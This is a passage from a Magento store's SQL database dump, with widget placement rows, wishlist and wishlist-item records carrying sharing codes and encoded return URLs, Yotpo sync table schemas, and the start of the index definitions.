(3, 'Magento\\Cms\\Block\\Widget\\Block', 4, 'latest-product', '0', '{\"block_id\":\"7\"}', 0),
(4, 'Magento\\Cms\\Block\\Widget\\Block', 4, 'second-banner', '0', '{\"block_id\":\"5\"}', 0),
(5, 'Magento\\Cms\\Block\\Widget\\Block', 4, 'copyright', '0', '{\"block_id\":\"8\"}', 0),
(6, 'Magento\\Cms\\Block\\Widget\\Block', 4, 'grocery', '0', '{\"block_id\":\"9\"}', 0),
(7, 'Magento\\Cms\\Block\\Widget\\Block', 4, 'third-banner', '0', '{\"block_id\":\"10\"}', 0),
(8, 'Magento\\Cms\\Block\\Widget\\Block', 4, 'cosmetics', '0', '{\"block_id\":\"11\"}', 0),
(9, 'Magento\\Cms\\Block\\Widget\\Block', 3, 'Contact us info', '0', '{\"block_id\":\"13\"}', 0),
(10, 'Magento\\Cms\\Block\\Widget\\Block', 3, 'Footer Links', '0', '{\"block_id\":\"12\"}', 0),
(11, 'Magento\\Cms\\Block\\Widget\\Block', 3, 'Sale Left Menu', '0', '{\"block_id\":\"14\"}', 0),
(12, 'Magento\\Cms\\Block\\Widget\\Block', 3, 'Gear Left Menu', '0', '{\"block_id\":\"15\"}', 0),
(13, 'Magento\\Cms\\Block\\Widget\\Block', 3, 'Men\'s Left Menu', '0', '{\"block_id\":\"16\"}', 0),
(14, 'Magento\\Cms\\Block\\Widget\\Block', 3, 'Women\'s Left Menu', '0', '{\"block_id\":\"17\"}', 0),
(15, 'Magento\\Cms\\Block\\Widget\\Block', 3, 'What\'s New Left Menu', '0', '{\"block_id\":\"18\"}', 0),
(16, 'Magento\\Cms\\Block\\Widget\\Block', 3, 'Women Category Content', '0', '{\"block_id\":\"19\"}', 0),
(17, 'Magento\\Cms\\Block\\Widget\\Block', 3, 'Training Category Content', '0', '{\"block_id\":\"20\"}', 0),
(18, 'Magento\\Cms\\Block\\Widget\\Block', 3, 'Men Category Content', '0', '{\"block_id\":\"21\"}', 0),
(19, 'Magento\\Cms\\Block\\Widget\\Block', 3, 'Gear Category Content', '0', '{\"block_id\":\"22\"}', 0),
(20, 'Magento\\Cms\\Block\\Widget\\Block', 3, 'New Products Category Content', '0', '{\"block_id\":\"24\"}', 0),
(21, 'Magento\\Cms\\Block\\Widget\\Block', 3, 'Sale Category Content', '0', '{\"block_id\":\"23\"}', 0),
(22, 'Magento\\Cms\\Block\\Widget\\Block', 3, 'Home Page', '0', '{\"block_id\":\"25\"}', 0),
(23, 'Magento\\Cms\\Block\\Widget\\Block', 3, 'Performance Fabrics', '0', '{\"block_id\":\"26\"}', 0),
(24, 'Magento\\Cms\\Block\\Widget\\Block', 3, 'Eco Friendly', '0', '{\"block_id\":\"27\"}', 0),
(25, 'Magento\\Cms\\Block\\Widget\\Block', 3, 'Login Info', '0', '{\"block_id\":\"29\"}', 0),
(26, 'Magento\\Cms\\Block\\Widget\\Block', 3, 'Giftcard Category Content', '0', '{\"block_id\":\"28\"}', 0);

-- --------------------------------------------------------

--
-- Table structure for table `widget_instance_page`
--

CREATE TABLE `widget_instance_page` (
  `page_id` int(10) UNSIGNED NOT NULL COMMENT 'Page ID',
  `instance_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Instance ID',
  `page_group` varchar(25) DEFAULT NULL COMMENT 'Block Group Type',
  `layout_handle` varchar(255) DEFAULT NULL COMMENT 'Layout Handle',
  `block_reference` varchar(255) DEFAULT NULL COMMENT 'Container',
  `page_for` varchar(25) DEFAULT NULL COMMENT 'For instance entities',
  `entities` text DEFAULT NULL COMMENT 'Catalog entities (comma separated)',
  `page_template` varchar(255) DEFAULT NULL COMMENT 'Path to widget template'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Instance of Widget on Page';

--
-- Dumping data for table `widget_instance_page`
--

INSERT INTO `widget_instance_page` (`page_id`, `instance_id`, `page_group`, `layout_handle`, `block_reference`, `page_for`, `entities`, `page_template`) VALUES
(1, 1, 'pages', 'cms_index_index', 'page.bottom', 'all', '', 'widget/static_block/default.phtml'),
(2, 2, 'pages', 'cms_index_index', 'content', 'all', '', 'widget/static_block/default.phtml'),
(3, 3, 'pages', 'cms_index_index', 'content', 'all', '', 'widget/static_block/default.phtml'),
(4, 4, 'pages', 'cms_index_index', 'content', 'all', '', 'widget/static_block/default.phtml'),
(5, 5, 'all_pages', 'default', 'footer', 'all', '', 'widget/static_block/default.phtml'),
(6, 6, 'pages', 'cms_index_index', 'content', 'all', '', 'widget/static_block/default.phtml'),
(7, 7, 'pages', 'cms_index_index', 'content', 'all', '', 'widget/static_block/default.phtml'),
(8, 8, 'pages', 'cms_index_index', 'content', 'all', '', 'widget/static_block/default.phtml'),
(9, 9, 'pages', 'contact_index_index', 'content.top', 'all', '', 'widget/static_block/default.phtml'),
(10, 10, 'all_pages', 'default', 'cms_footer_links_container', 'all', '', 'widget/static_block/default.phtml'),
(11, 11, 'anchor_categories', 'catalog_category_view_type_layered', 'sidebar.main', 'specific', '42', 'widget/static_block/default.phtml'),
(12, 12, 'anchor_categories', 'catalog_category_view_type_layered', 'sidebar.main', 'specific', '8', 'widget/static_block/default.phtml'),
(13, 13, 'anchor_categories', 'catalog_category_view_type_layered', 'sidebar.main', 'specific', '16', 'widget/static_block/default.phtml'),
(14, 14, 'anchor_categories', 'catalog_category_view_type_layered', 'sidebar.main', 'specific', '25', 'widget/static_block/default.phtml'),
(15, 15, 'anchor_categories', 'catalog_category_view_type_layered', 'sidebar.main', 'specific', '43', 'widget/static_block/default.phtml'),
(16, 16, 'anchor_categories', 'catalog_category_view_type_layered', 'content.top', 'specific', '25', 'widget/static_block/default.phtml'),
(17, 17, 'anchor_categories', 'catalog_category_view_type_layered', 'content.top', 'specific', '14', 'widget/static_block/default.phtml'),
(18, 18, 'anchor_categories', 'catalog_category_view_type_layered', 'content.top', 'specific', '16', 'widget/static_block/default.phtml'),
(19, 19, 'anchor_categories', 'catalog_category_view_type_layered', 'content.top', 'specific', '8', 'widget/static_block/default.phtml'),
(20, 20, 'anchor_categories', 'catalog_category_view_type_layered', 'content.top', 'specific', '43', 'widget/static_block/default.phtml'),
(21, 21, 'anchor_categories', 'catalog_category_view_type_layered', 'content.top', 'specific', '42', 'widget/static_block/default.phtml'),
(22, 22, 'pages', 'cms_index_index', 'content', 'all', '', 'widget/static_block/default.phtml'),
(23, 23, 'anchor_categories', 'catalog_category_view_type_layered', 'content.top', 'specific', '44', 'widget/static_block/default.phtml'),
(24, 24, 'anchor_categories', 'catalog_category_view_type_layered', 'content.top', 'specific', '45', 'widget/static_block/default.phtml'),
(25, 25, 'pages', 'customer_account_login', 'customer.login.container', 'all', '', 'widget/static_block/default.phtml'),
(26, 26, 'anchor_categories', 'catalog_category_view_type_layered', 'content.top', 'specific', NULL, 'widget/static_block/default.phtml');

-- --------------------------------------------------------

--
-- Table structure for table `widget_instance_page_layout`
--

CREATE TABLE `widget_instance_page_layout` (
  `page_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Page ID',
  `layout_update_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Layout Update ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Layout updates';

--
-- Dumping data for table `widget_instance_page_layout`
--

INSERT INTO `widget_instance_page_layout` (`page_id`, `layout_update_id`) VALUES
(1, 1),
(2, 2),
(3, 3),
(4, 4),
(5, 5),
(6, 6),
(7, 7),
(8, 8),
(9, 9),
(10, 10),
(11, 11),
(12, 12),
(13, 13),
(14, 14),
(15, 15),
(16, 16),
(17, 17),
(18, 18),
(19, 19),
(20, 20),
(21, 21),
(22, 22),
(23, 23),
(24, 24),
(25, 25),
(26, 26);

-- --------------------------------------------------------

--
-- Table structure for table `wishlist`
--

CREATE TABLE `wishlist` (
  `wishlist_id` int(10) UNSIGNED NOT NULL COMMENT 'Wishlist ID',
  `customer_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer ID',
  `shared` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Sharing flag (0 or 1)',
  `sharing_code` varchar(32) DEFAULT NULL COMMENT 'Sharing encrypted code',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Last updated date'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Wishlist main Table';

--
-- Dumping data for table `wishlist`
--

INSERT INTO `wishlist` (`wishlist_id`, `customer_id`, `shared`, `sharing_code`, `updated_at`) VALUES
(1, 2, 0, '9W5rFloxXMyWm6ZV2PFay8ngDsTUVMKS', '2020-08-22 08:24:12'),
(2, 3, 0, 'neBGAe5k3lz2xWKKFoeOo1IZUDfwKwBs', '2020-08-24 01:49:37'),
(3, 4, 0, 'JLY26cbIF2iTA6T2GLNf4Qwze9DSy54U', '2020-08-26 06:11:00'),
(4, 5, 0, 'ZElf9DMAHn5tcAZLxZH28sZmUTDQOhor', '2020-09-14 05:34:56'),
(5, 6, 0, 'AcFwE5hRxetIGm1wxGynP6VfcQzhFGzq', '2021-04-21 10:07:53'),
(6, 7, 0, 'U3ixj7rbMXZXnAgJD1YwFfrA8Jyn1OOI', '2021-04-26 09:11:36'),
(7, 8, 0, '2UH9JibIUVEMjgyFY7tMbEGOpRHWI6OG', '2021-04-26 22:18:01'),
(8, 9, 0, 'faqRl7OPCIZqa5Z4iSCC8WCJYrSSqWss', '2021-04-29 01:27:50'),
(9, 10, 0, 'MtLZEqDb1yUmbVYDBO8LkkEU1KyoMutz', '2021-05-02 11:04:57'),
(10, 11, 0, 'WPtl9pntwtenBzUwzv6TJUa4lSjOqi3m', '2021-05-12 07:43:48'),
(11, 12, 0, '85Sri1lk8rtenKiqOBmUoPfrFlR35xZ1', '2021-05-27 14:47:15'),
(12, 13, 0, 'IYfJHsAdN57JeuWyqd8CGq16F1OUFrIL', '2021-06-05 17:43:17'),
(13, 14, 0, 'rMpHFHQXgP7SYyikIkDXTmOkZS09PQ8t', '2021-06-08 12:03:32'),
(14, 15, 0, '1bKU7GmQv4MWOkOdWwqXW0QTmYXZIJif', '2021-06-12 02:59:35'),
(15, 16, 0, 'RH2hb3B2HVYiEeCWllDv70ciwZxuaQaz', '2021-06-27 11:43:01'),
(16, 17, 0, 'X0ZTXrz3E4hAI9ZXRQsptpj0sT8jzq39', '2021-10-18 05:28:00'),
(17, 18, 0, 'HQNZ9ArzFoPw1CMqx0Hx4L8NKqHYrAJt', '2021-10-27 14:02:08'),
(18, 19, 0, 'vPE6jtD5i8Tz0y9fAVTaOC4fMk4HHooW', '2021-11-06 09:04:51'),
(19, 20, 0, 'Pt1gxFr4D9WB9m4OA4kE9uRy5XcceviO', '2021-11-20 19:00:27'),
(20, 21, 0, 'O5W4enjDshHL67LJtmJz0RYnODQUQeyt', '2021-11-22 09:55:19'),
(21, 22, 0, 'RRPvowDJ4D42DQyoFhT8ENbQhCA5CS13', '2021-12-03 09:49:22'),
(22, 23, 0, 'hddxnUctWW5lwtO7RgtEHh2Rq0ZzlrsJ', '2021-12-21 02:49:22'),
(23, 24, 0, 'D9urRdhi7LxDeriegTbXO69DV5sygd52', '2021-12-22 07:28:08'),
(24, 25, 0, 'zgabxSsfHRfXdYc8yLh9KlLu46m2uv2M', '2021-12-31 16:38:38'),
(25, 26, 0, 'opU1KWPRqnebxXDGRBakuY0ea7XfKLHK', '2022-01-06 21:12:41'),
(26, 27, 0, 'ASph4MfPeavSimvk2nkIlhzCnEU2b9VN', '2022-01-12 14:38:27'),
(27, 28, 0, 'XOV2m2LKyjIZjpkj6cPjicIoXjQ0KpaU', '2022-01-14 01:49:29'),
(28, 29, 0, 'bFG0r5CF81Ypjqz4UU27QwuLvlaKGKbA', '2022-01-22 07:27:27'),
(29, 30, 0, 'VoJkx4y3RYTpoYStVIEgti0M1eiDW4Jz', '2022-01-23 09:16:39'),
(30, 31, 0, 'iNAdKVpRrki0sfpwXxzBpH6OLoCJg9Dk', '2022-02-07 18:51:32'),
(31, 32, 0, 'v0T9gzREfMGNFCtTudBQPZI3xRM3uXsZ', '2022-02-23 21:09:12'),
(32, 33, 0, 'MKrr9tN2s5MRoEaGodnb0R4IUUQ7f3ty', '2022-02-24 23:13:01'),
(33, 34, 0, 'w3lmkPpGuKP5OW02mZ8Vp8OBEzi4TMSB', '2022-03-06 21:48:07'),
(34, 35, 0, 'MpyF99WzMI9ioUwXdiddLPZfITkhfUya', '2022-03-21 09:39:05'),
(35, 36, 0, '51stBJttPuto6otSYjwX3sEsQ6YMVVrC', '2022-03-27 13:21:49'),
(36, 37, 0, 'PWvQTk7riOV2zN0kagYwQFKLJ6lo379s', '2022-03-28 13:01:37'),
(37, 38, 0, 'EQmY7aLd9mxNshn9MACJ7Bed9jlDao41', '2022-04-02 08:01:07'),
(38, 39, 0, '1Ynva2XnKL3sJHkG8qZ3F6jDzODnD4we', '2022-04-03 02:35:49'),
(39, 40, 0, 'wwbo1ajeYVJZJSW4a3b3ZnxufOmOBWe3', '2022-04-10 13:11:07'),
(40, 41, 0, 'X23WU3Geq6B92icZSpLxZz9NJJzaWSxb', '2022-04-16 06:33:31'),
(41, 42, 0, '0rDkHDaYj5VZPnwQbHlcElGKHsVcIH9Y', '2022-04-18 15:17:41'),
(42, 43, 0, 'jPL3mjkFgk71hrOQfRww829IAVKWeqmf', '2022-04-23 00:03:57'),
(43, 44, 0, 'hhftnokJEnr99vUhuHJhShDNSkFTpxN4', '2022-05-05 22:22:59'),
(44, 45, 0, 'mhPX777U4hICzaVmTJcsD4wibWdXPXwX', '2022-05-06 18:26:19'),
(45, 46, 0, 'aWBtDGYjov21Hl2ztG2ruUnl935cVvcR', '2022-05-13 10:04:05'),
(46, 47, 0, 'XSOdy0LkaUpdChdqDts8ZW6xGRouGxDp', '2022-05-14 01:52:47'),
(47, 48, 0, 'IVR42RfG5cJmXnCPzxjkLKqEbGkQDiPc', '2022-06-04 23:05:45'),
(48, 49, 0, 'OdAzbE46ofAG3pMfuPRTmM8kzIJTcwiO', '2022-06-22 14:50:39'),
(49, 50, 0, 'cZOLevOgICfvy15vZvUtWliUmJ1PfG7e', '2022-06-28 00:43:02'),
(50, 51, 0, 'XmyiGV3rQHwRS2vBhWYwsEFkw2wOWYgc', '2022-07-20 04:55:14'),
(51, 52, 0, 'WFCnrn9cfopYRmVOrzg5sCOgUTH9cbmY', '2022-07-20 17:27:11'),
(52, 53, 0, 'OuWNIYq2Ine9pAv99GMNxuwSVK0KxsaN', '2022-07-29 22:54:23'),
(53, 54, 0, 'sLBdpD729JxJ0lJ26x9WD7isudTgjF2w', '2022-07-30 13:14:46'),
(54, 55, 0, 'bMG7JgbKu1SkxX3cr6ugArb1DG0IWVNW', '2022-08-14 02:33:05'),
(55, 56, 0, 'M6dNEVpu0onw7t7U52lkECq1AYz5Zgm7', '2022-08-28 04:30:38'),
(56, 57, 0, 'IJmtzapob51NgjjAvS0xEnixLAgm7HDd', '2022-10-24 18:48:17'),
(57, 58, 0, 'Ud6FcHTS5aowzJn60ERmad1biVopS2cE', '2022-11-21 04:16:59'),
(58, 61, 0, 'mUJXokTX7xvQ2J6HSvnu47A3TCdFErCQ', '2022-12-15 01:37:00'),
(59, 67, 0, '4uBbfX3NTlULcHwabVk4UBkAkiOrpvoN', '2023-05-31 16:43:21'),
(60, 68, 0, '6WeIF6P0aQApS4ZCCPbpBg946DeUiY1B', '2023-06-18 23:46:28'),
(61, 69, 0, 'xBETSdUcYfLxOFlrBZOIzbyyyyxqin9H', '2023-08-02 01:16:27'),
(62, 70, 0, 'ijoTgx6t9HSP8ATWjasGjfIbwsHs3kUH', '2023-08-02 19:40:36'),
(63, 71, 0, 'fEmyPf4MU7G7zvJLO7wR9HX4ePPO7T7k', '2023-08-03 17:48:36'),
(64, 72, 0, 'tKxgnf67P0oc1jHXzCxBjTxyozmJm2fx', '2023-08-04 18:33:13'),
(65, 73, 0, 'UIn0oJGxAsA3BX1w1FPg6aiyQfs20wqL', '2023-08-05 11:37:13'),
(66, 74, 0, 'LtK76S04FdZqML9I9NG8T0LoxKeJKY35', '2023-08-12 01:27:49'),
(67, 75, 0, 'z97PBwzE4MXEw6HU0TrGZTNF359bl4EG', '2023-08-12 08:28:08'),
(68, 76, 0, 'zhq2LjZNvrYmZc9C7P6gOINBopAzdUmg', '2023-09-02 04:00:18'),
(69, 77, 0, 'nMVAMmiW8zrRdGPDim6VdB3GtpplLdk0', '2023-09-05 13:01:48'),
(70, 78, 0, 'NpBk3Za4Il1IY0nrX7EiAiAsHSFNUEoc', '2023-09-11 00:20:20'),
(71, 79, 0, '3aswnSztySUQPS8PbL1JkjZS4RuBPttZ', '2023-11-10 10:35:24'),
(72, 80, 0, '262Mk30S76qnP7CHnwlSPJu7gTEcvtpX', '2023-11-24 01:23:52'),
(73, 81, 0, 'Iqujm22JPtqJ0pa90EJk1790nhiMG4hA', '2023-11-26 22:37:29'),
(74, 82, 0, 'PzDBVelU7Hfz6DcHJww6rd344Kzf5iVF', '2023-12-01 00:22:49'),
(75, 83, 0, 'bjDMp3t6gXjYKiajH7KwBDbNKmIvpqDp', '2023-12-02 06:52:19'),
(76, 84, 0, 'eVeVDM1LYx5Bic0JdqxdEr7AX9AZfyqE', '2023-12-07 10:59:19'),
(77, 85, 0, '8wMRKQ7m9g4z32pdlDKJdY5coEs83hrb', '2023-12-08 12:58:10'),
(78, 86, 0, 'V1TOiKB50oKWTXAwB5BG4fispa7VxMIv', '2023-12-10 12:24:35'),
(79, 87, 0, 'rxNiaqMXi1l13obMt6XahmvpxrLCim5P', '2023-12-12 04:13:58'),
(80, 88, 0, 'AxW18WTCrZUyoKmZ3Tu7LlabfWWhuTMS', '2023-12-13 18:55:52'),
(81, 89, 0, 'q0q75cV9BnwSEAH1A8g56qNNBjhtczZd', '2023-12-31 13:54:48'),
(82, 90, 0, 'rZgagn8MafuLFSzscjHQ7kaR6Lf6Nmjc', '2024-01-01 21:04:19'),
(83, 91, 0, 'AxqiTnv6cwv1VpiuffJtDTxLyvpRbqfK', '2024-01-27 10:55:03'),
(84, 92, 0, 'EIBFIyF1MOkAJKBUCFv2oAXxZTXMRsCX', '2024-02-02 05:46:58'),
(85, 93, 0, '35SASVC2WcsoGZnmMqBkHEU89hZnr8KR', '2024-02-05 02:48:05'),
(86, 94, 0, 'jbAjzG8xXIki4iZcOUPhAH7bFB179BMC', '2024-02-16 23:28:00'),
(87, 95, 0, 'zSuFwNuzkXbObYfvrk7AVn5bjFyivZFM', '2024-02-24 22:49:53'),
(88, 96, 0, '9ztJ1co8EmhivnnHEoopTOgF5N0uxXFI', '2024-03-06 08:37:31'),
(89, 97, 0, 'UvaQeZWEwqqEhnCf00lhKVqUrYOffEDf', '2024-03-12 15:33:51'),
(90, 98, 0, 'epbZEB0jWmbs9LQiS34eqrY0iMJLU8x1', '2024-03-28 08:27:21'),
(91, 99, 0, 'yXJI91Wfpta2YMqpgCfJPGCLAAxDtp0o', '2024-06-17 01:57:51'),
(92, 100, 0, '2S4peF8mvT0oChQNQ7n412KvlGD7o4c5', '2024-09-17 12:18:10'),
(93, 101, 0, 'r4lLsnZo9s1lr07vXnXMMOnO4ImRQBN4', '2024-09-22 17:27:40'),
(94, 102, 0, 'TIQc7CrWHi4b4TN4d722jYy1tzguJiKb', '2024-09-28 19:21:19'),
(95, 103, 0, 'XPhaumUPdH4dNQM7H5kuZrgkliyQFlAQ', '2024-10-01 09:48:08'),
(96, 104, 0, 'vCQjN0k2wU6cwnJlrXzfJL4YZ2oLtQ3O', '2024-10-18 10:25:07'),
(97, 105, 0, 'MBIx2Oo1kpXHdQ84atR9rzwmjczAi3u0', '2024-10-21 19:10:26'),
(98, 106, 0, '4RNcvCzu4xiAxNegQvjWy3saPl2SfSqp', '2024-10-26 02:34:17'),
(99, 107, 0, 'T0McVgChftMZ6EbOtHWIu3o8XGkDCAAw', '2024-11-04 11:58:36'),
(100, 108, 0, 'zBZGOO0rGDJIVRS7J1qMQehLpWrKVdVw', '2024-11-17 09:57:20'),
(101, 110, 0, 'FLbIarxi6jG44Rb276ZUhmsENYCLZzud', '2025-02-05 11:09:16'),
(102, 111, 0, 'aTLyqKfprVttbTCtRaqyPKdgchlciSDR', '2025-02-28 19:58:27'),
(103, 112, 0, 'ddCQbgkqrY2ifEM6OJQQx1WW8mdJTFex', '2025-05-23 12:20:11'),
(104, 113, 0, '6WMCkzWf9BRtklgVhyDhBlBgNV8fY7gH', '2025-07-02 22:24:29'),
(105, 114, 0, 'P1nkvZvPHYzVDrtj8bExERcO1pxpyFLk', '2025-07-04 22:01:03'),
(106, 116, 0, 'Wgyhee2vcpRYD1xxVutbY2Hgm0TeD7IR', '2026-01-02 07:02:27'),
(107, 118, 0, 'klIxKIeq6SXqJVVWb8tdbkgl5pd1hE19', '2026-01-03 11:04:16'),
(108, 119, 0, 'RZ4zcu5ZS5O0mTANd5m3MSq7gbL68Lsb', '2026-01-07 23:06:36'),
(109, 120, 0, 'FNeolxiMw8pPtmz1DK3C2icSSDkBCZHV', '2026-01-08 10:42:38'),
(110, 121, 0, 'T3LIJwSNfiWUC8jc7W6oHHOTIz8XoGl3', '2026-01-11 16:07:10'),
(111, 122, 0, 'nzvUwJC7il0AfN7lYKPfyoCOHYlSzQOl', '2026-01-13 15:18:25'),
(112, 123, 0, 'cvLG8iQf1kOVkAJjQdiBxeiv59KHzk0f', '2026-02-02 11:23:26'),
(113, 124, 0, 'FhU936nqajrpYUthaNkj7rUVtZHiQI4f', '2026-02-05 11:11:13'),
(114, 125, 0, 'sFZlceHxqwrEKyIds01zaghp2Pr2VOtn', '2026-02-22 14:24:12'),
(115, 126, 0, '95r0bvU5AZbJ7BishiDo2b5MgWoem84p', '2026-02-27 06:07:55'),
(116, 127, 0, 'ofFw7nWZbHO6DMlQBG4tEogz7PieO1cg', '2026-03-02 01:55:47'),
(117, 128, 0, 'I0DlAsw2aAJN7H9IRrNPzIgPz2SkVGN8', '2026-03-10 06:54:25'),
(118, 129, 0, '2qvARo6EYiojMxeDv1r6GTLmF1iqcuXD', '2026-03-12 21:19:21'),
(119, 130, 0, 'TsC0EhymLazjzFEKE6pvlZmAbjjbBwDf', '2026-03-27 17:53:07'),
(120, 131, 0, '88MqqNZfrAra8BAUc0GyLbnBWFciHITW', '2026-03-28 09:04:06'),
(121, 132, 0, 'qKJ0O9dHhgIXfufe5KlBJAhwBbPZUmQy', '2026-04-09 14:21:42'),
(122, 133, 0, 'ocCb4SoBQy6dh3Lkv3L655eN5n0taL83', '2026-04-10 17:29:17'),
(123, 134, 0, 'qmZJOUCutdGaj8lVhGdRnIguzyH2DXv6', '2026-04-18 13:35:38'),
(124, 135, 0, '5RV8xQJq0px7gpbXUkAtM4hQCAzEEUnV', '2026-04-21 14:27:27'),
(125, 136, 0, 'PIMDmpmjiu8kIZO1ZvvsXeiOm9D3deQk', '2026-04-28 00:13:24'),
(126, 137, 0, 'zTJN9ZVEIszZKbO0qZhjG3YZNxlb9BbF', '2026-04-30 04:11:26'),
(127, 138, 0, 'q0ownDQ9RcnN9nwl0GPAvarQP7ItZzrd', '2026-04-30 22:07:46');

-- --------------------------------------------------------

--
-- Table structure for table `wishlist_item`
--

CREATE TABLE `wishlist_item` (
  `wishlist_item_id` int(10) UNSIGNED NOT NULL COMMENT 'Wishlist item ID',
  `wishlist_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Wishlist ID',
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `added_at` timestamp NULL DEFAULT NULL COMMENT 'Add date and time',
  `description` text DEFAULT NULL COMMENT 'Short description of wish list item',
  `qty` decimal(12,4) NOT NULL COMMENT 'Qty'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Wishlist items';

--
-- Dumping data for table `wishlist_item`
--

INSERT INTO `wishlist_item` (`wishlist_item_id`, `wishlist_id`, `product_id`, `store_id`, `added_at`, `description`, `qty`) VALUES
(1, 2, 2062, 1, '2020-08-24 01:49:37', NULL, 1.0000),
(3, 56, 2061, 1, '2022-10-24 18:48:17', NULL, 1.0000),
(4, 58, 2061, 1, '2022-12-15 01:37:11', NULL, 1.0000),
(5, 59, 2063, 1, '2023-05-31 16:43:21', NULL, 1.0000);

-- --------------------------------------------------------

--
-- Table structure for table `wishlist_item_option`
--

CREATE TABLE `wishlist_item_option` (
  `option_id` int(10) UNSIGNED NOT NULL COMMENT 'Option ID',
  `wishlist_item_id` int(10) UNSIGNED NOT NULL COMMENT 'Wishlist Item ID',
  `product_id` int(10) UNSIGNED NOT NULL COMMENT 'Product ID',
  `code` varchar(255) NOT NULL COMMENT 'Code',
  `value` text DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Wishlist Item Option Table';

--
-- Dumping data for table `wishlist_item_option`
--

INSERT INTO `wishlist_item_option` (`option_id`, `wishlist_item_id`, `product_id`, `code`, `value`) VALUES
(1, 1, 2062, 'info_buyRequest', '{\"product\":\"2062\",\"uenc\":\"aHR0cDovLzExOC4xNzkuNDMuMjAvYmlzbW95Lw,,\",\"form_key\":\"ebfpnjJIro32zmAJ\"}'),
(3, 3, 2061, 'info_buyRequest', '{\"product\":\"2061\",\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"form_key\":\"qOVtu1McpB0iynrc\"}'),
(4, 4, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY2F0YWxvZy9wcm9kdWN0L3ZpZXcvaWQvMjA2MS8%2C\",\"product\":\"2061\",\"form_key\":\"iEfHAuWsA1EpjQmh\"}'),
(5, 5, 2063, 'info_buyRequest', '{\"product\":\"2063\",\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC1mYWNlLmh0bWw,\",\"form_key\":\"caEaSNaMmqJrAklR\"}');

-- --------------------------------------------------------

--
-- Table structure for table `yotpo_order_status_history`
--

CREATE TABLE `yotpo_order_status_history` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Id',
  `order_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Order Id',
  `store_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Store Id',
  `old_status` varchar(32) DEFAULT NULL COMMENT 'Old Status',
  `new_status` varchar(32) DEFAULT NULL COMMENT 'New Status',
  `created_at` datetime DEFAULT NULL COMMENT 'Created At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='yotpo_order_status_history';

-- --------------------------------------------------------

--
-- Table structure for table `yotpo_rich_snippets`
--

CREATE TABLE `yotpo_rich_snippets` (
  `rich_snippet_id` int(11) NOT NULL COMMENT 'Id',
  `product_id` int(11) NOT NULL COMMENT 'Product Id',
  `store_id` int(11) NOT NULL COMMENT 'Store Id',
  `average_score` decimal(10,2) NOT NULL COMMENT 'Average Score',
  `reviews_count` float(10,0) NOT NULL COMMENT 'Reviews Count',
  `expiration_time` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Expiry Time'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='yotpo_rich_snippets';

-- --------------------------------------------------------

--
-- Table structure for table `yotpo_sync`
--

CREATE TABLE `yotpo_sync` (
  `sync_id` int(10) UNSIGNED NOT NULL COMMENT 'Id',
  `store_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `entity_type` varchar(50) DEFAULT NULL COMMENT 'Entity Type',
  `entity_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Entity ID',
  `sync_flag` smallint(6) DEFAULT 0 COMMENT 'Sync Flag',
  `sync_date` datetime NOT NULL COMMENT 'Sync Date'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='yotpo_sync';

--
-- Indexes for dumped tables
--

--
-- Indexes for table `adminnotification_inbox`
--
ALTER TABLE `adminnotification_inbox`
  ADD PRIMARY KEY (`notification_id`),
  ADD KEY `ADMINNOTIFICATION_INBOX_SEVERITY` (`severity`),
  ADD KEY `ADMINNOTIFICATION_INBOX_IS_READ` (`is_read`),
  ADD KEY `ADMINNOTIFICATION_INBOX_IS_REMOVE` (`is_remove`);

--
-- Indexes for table `admin_analytics_usage_version_log`
--
ALTER TABLE `admin_analytics_usage_version_log`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `ADMIN_ANALYTICS_USAGE_VERSION_LOG_LAST_VIEWED_IN_VERSION` (`last_viewed_in_version`);

--
-- Indexes for table `admin_passwords`
--
ALTER TABLE `admin_passwords`
  ADD PRIMARY KEY (`password_id`),
  ADD KEY `ADMIN_PASSWORDS_USER_ID` (`user_id`);

--
-- Indexes for table `admin_system_messages`
--
ALTER TABLE `admin_system_messages`
  ADD PRIMARY KEY (`identity`);

--
-- Indexes for table `admin_user`
--
ALTER TABLE `admin_user`
  ADD PRIMARY KEY (`user_id`),
  ADD UNIQUE KEY `ADMIN_USER_USERNAME` (`username`);

--
-- Indexes for table `admin_user_session`
--
ALTER TABLE `admin_user_session`
  ADD PRIMARY KEY (`id`),
  ADD KEY `ADMIN_USER_SESSION_SESSION_ID` (`session_id`),
  ADD KEY `ADMIN_USER_SESSION_USER_ID` (`user_id`);

--
-- Indexes for table `adobe_stock_asset`
--
ALTER TABLE `adobe_stock_asset`
  ADD PRIMARY KEY (`id`),
  ADD KEY `ADOBE_STOCK_ASSET_MEDIA_GALLERY_ID_MEDIA_GALLERY_ASSET_ID` (`media_gallery_id`),
  ADD KEY `ADOBE_STOCK_ASSET_ID` (`id`),
  ADD KEY `ADOBE_STOCK_ASSET_CATEGORY_ID` (`category_id`),
